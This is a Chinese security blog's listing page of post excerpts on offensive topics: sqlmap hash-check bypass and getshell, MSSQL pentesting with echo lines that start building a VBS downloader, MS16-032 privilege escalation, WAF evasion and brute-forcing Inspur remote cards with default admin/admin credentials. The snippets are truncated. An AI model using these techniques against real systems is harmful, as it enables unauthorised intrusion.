服务器 - 第 81 | CN-SEC 中文网

网警的强大，你们真的了解吗

大致分为下列几种情况： 1. 不用代理网民发帖流程：发帖人　→　ISP　→　服务器托管商　→　服务器网警追踪流程：网监　→　服务器 IP　→　发帖人 IP　→　发帖人 ISP　→　档案爆菊几...

05月19日颓废's Blog833 views评论

阅读全文

sqlmap代理绕过参数hash验证

发送真正请求的方式为: avar s = "api.php?id=" + args["id"] + "&hash=" + ar[0] + "&time=" + ar...

05月19日颓废's Blog994 views评论

阅读全文

颓废's Blog

sqlmap修改最大线程数，效率爆表

找到/lib/core/settings.py,打开文件，搜索MAX_NUMBER_OF_THREADS，将数值改为你想要的最大线程数，例如99999999

05月19日5,459 views评论

阅读全文

颓废's Blog

域传送漏洞

首先了解下常用域名记录 A记录 IP地址记录,记录一个域名对应的IP地址 AAAA记录 IPv6 地址记录，记录一个域名对应的IPv6地址 CNAME记录别名记录，记录一个主机的...

05月19日524 views评论

阅读全文

站库分离情况的渗透思路（MSSQL）

DOS命令：（一条一条执行） echo Set Post = CreateObject("Msxml2.XMLHTTP") >>xxx.vbs echo Set She...

05月19日颓废's Blog849 views1

阅读全文

颓废's Blog

MS16-032服务器提权

支持03-12全版本服务器以及部分在桌面操作系统上运行的服务（例如程序猿开启的SQLServer）。主要原理是利用服务默认具备的特权模拟执行，有Token有特权只支持服务器操作...

05月19日1,184 views评论

阅读全文

过waf简单总结

第一类waf，像安全狗，云锁此类，直接安装在目标服务器上。首先，需要注意的是，这类东西一旦触发警报，就会立刻短信通知站长，所以盲测动静是很大的。从防护方式上来说，以安全狗为例，就是简单粗暴的去匹配HT...

05月19日颓废's Blog527 views评论

阅读全文

颓废's Blog

渗透测试流程之信息收集

C段：先入侵同一网段中容易入侵的计算机，再通过C段入侵的计算机来入侵目标主机

05月19日546 views评论

阅读全文

颓废's Blog

浪潮远控卡登录爆破漏洞（附爆破脚本）

爆破成功浪潮远控卡可以尝试使用admin/admin进行登录尝试，很有可能可以进去。另外浪潮远控卡登录没有验证码，没有频率测试限制，可以轻松使用burpsuite进行登录爆破尝试...

05月19日899 views评论

阅读全文

颓废's Blog

sqlmap连接Mysql实现getshell

首先得知道这个玩意，sqlmap -help,不说大家也懂搜嘎. 语法为:" DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAM...

05月19日1,277 views2

阅读全文

云安全

云服务器面临的九大安全威胁

云计算技术在近年来获得前所未有的增长。云技术如今已被运用到银行、学校、政府以及大量的商业组织。但是云计算也并非万能的，和其他IT部署架构一样存在某些难以弥补的缺陷。例如公有云典型代表：云服务器，用户数...

05月14日1,079 views评论

阅读全文

云安全

优化云安全的三个要素：设备保护、网络安全、用户行为

如今，许多首席信息安全官呼吁人们需要正视云计算的安全需求。然而，尽管大家都有着共同的关注点，但采取的方法却各不相同;有些人呼吁在服务器方面做好防护工作，而另一些人则希望把重点放在工作人员在文件的上传、...

05月14日857 views评论

阅读全文

网警的强大，你们真的了解吗

sqlmap代理绕过参数hash验证

sqlmap修改最大线程数，效率爆表

域传送漏洞

站库分离情况的渗透思路（MSSQL）

MS16-032服务器提权

过waf简单总结

渗透测试流程之信息收集

浪潮远控卡登录爆破漏洞（附爆破脚本）

sqlmap连接Mysql实现getshell

云服务器面临的九大安全威胁

优化云安全的三个要素：设备保护、网络安全、用户行为

在线咨询

微信